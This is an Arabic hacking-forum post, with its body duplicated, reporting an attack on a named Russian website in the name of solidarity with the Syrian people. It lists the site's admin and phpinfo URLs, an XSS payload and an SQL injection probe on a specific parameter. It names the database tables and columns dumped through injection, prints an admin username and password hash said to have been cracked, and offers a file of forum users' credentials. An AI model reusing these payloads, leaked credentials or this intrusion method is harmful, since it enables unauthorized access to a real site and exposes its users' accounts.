خالد سعودي
New Member
معلومات موقع مع الادمن بواسطة خالد سعودي تضامن مع الشعب السوري الحر
بسم الله الرحمن الرحيم
السلام عليكم ورحمه الله وبركاته
http://www.tristihii.ru/
Server: Apache
http://www.tristihii.ru/phpinfo.php
http://www.tristihii.ru/robots.txt
http://www.tristihii.ru/feedback/admin/
http://www.tristihii.ru/forum3//adm(تم تعطيلها من قبل الموقع)
http://www.tristihii.ru/forum3/ucp.php?mode=login ( دخول المنتدي الاعضاء) فكيت الباس المشفر ممكن دخول الادمن من هنا مثل الاعضاء
ثغرات المصابة
http://www.tristihii.ru/raspis/ind.php?view=1&school="><script>*****('XssssssssssSS')</script>
http://www.tristihii.ru/raspis/ind.php?view=1&school=all'
تم استغلال الثغرت sql وستخراج المعلومات
عدد الصفوف: 1040
المفيد
القاعدة stihii38_club الجدول poll_user العمود username,userpass
النتيجة
admin:f5328997cd73821b7258bdfe81d87266
الباس المشفر بعد فكه
تم الدخول ولكن
http://www.tristihii.ru/feedback/admin/
ليس لها صلاحية كافية
القاعدة stihii38_club الجدول forum3_users العمود username,username_clean,user_password,user_email,user_email_hash
ملاحظة اذ ماضيفت العمود user_email_hash =82181265626 يطلع ماهو واضح؟؟؟:sly:
النتيجة
يرفع لكم ملف txt
فك الباسبورد المشفر
دخل من هنا url]http://www.tristihii.ru/forum3/ucp.php?mode=login
ركز على رقم [23]
ممكن يكون دخول نفس الاعضاء
فمان الرحمن
تضامن مع الشعب السوري الحر
السلام عليكم ورحمه الله وبركاته
http://www.tristihii.ru/
Server: Apache
http://www.tristihii.ru/phpinfo.php
http://www.tristihii.ru/robots.txt
http://www.tristihii.ru/feedback/admin/
http://www.tristihii.ru/forum3//adm(تم تعطيلها من قبل الموقع)
http://www.tristihii.ru/forum3/ucp.php?mode=login ( دخول المنتدي الاعضاء) فكيت الباس المشفر ممكن دخول الادمن من هنا مثل الاعضاء
ثغرات المصابة
http://www.tristihii.ru/raspis/ind.php?view=1&school="><script>*****('XssssssssssSS')</script>
http://www.tristihii.ru/raspis/ind.php?view=1&school=all'
تم استغلال الثغرت sql وستخراج المعلومات
عدد الصفوف: 1040
المفيد
القاعدة stihii38_club الجدول poll_user العمود username,userpass
النتيجة
admin:f5328997cd73821b7258bdfe81d87266
الباس المشفر بعد فكه
تم الدخول ولكن
http://www.tristihii.ru/feedback/admin/
ليس لها صلاحية كافية
القاعدة stihii38_club الجدول forum3_users العمود username,username_clean,user_password,user_email,user_email_hash
ملاحظة اذ ماضيفت العمود user_email_hash =82181265626 يطلع ماهو واضح؟؟؟:sly:
النتيجة
يرفع لكم ملف txt
فك الباسبورد المشفر
دخل من هنا url]http://www.tristihii.ru/forum3/ucp.php?mode=login
ركز على رقم [23]
ممكن يكون دخول نفس الاعضاء
فمان الرحمن
تضامن مع الشعب السوري الحر
اسم الموضوع : معلومات موقع مع الادمن بواسطة خالد سعودي تضامن مع الشعب السوري الحر
|
المصدر : SQL قواعد البيانات